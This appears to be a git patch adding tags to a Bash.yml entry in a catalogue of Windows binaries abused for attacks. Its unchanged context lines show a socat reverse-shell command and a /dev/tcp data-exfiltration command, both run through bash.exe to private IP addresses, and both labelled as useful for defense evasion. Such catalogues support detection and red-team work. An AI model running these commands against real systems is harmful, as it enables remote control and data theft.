From 6d4ac1c6806e03e880f64007a59faccdd94feddd Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 12:02:27 +0200
Subject: [PATCH] Update Bash.yml

Added tags:
- Execute: CMD
- Input: Custom format
---
 yml/OSBinaries/Bash.yml | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml
index d257f75..87d2963 100644
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@@ -11,6 +11,9 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
+      - Input: Custom Format
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -18,6 +21,9 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
+      - Input: Custom Format
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -25,6 +31,9 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
+      - Input: Custom Format
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@@ -32,6 +41,9 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10
+    Tags:
+      - Execute: CMD
+      - Input: Custom Format
 Full_Path:
   - Path: C:\Windows\System32\bash.exe
   - Path: C:\Windows\SysWOW64\bash.exe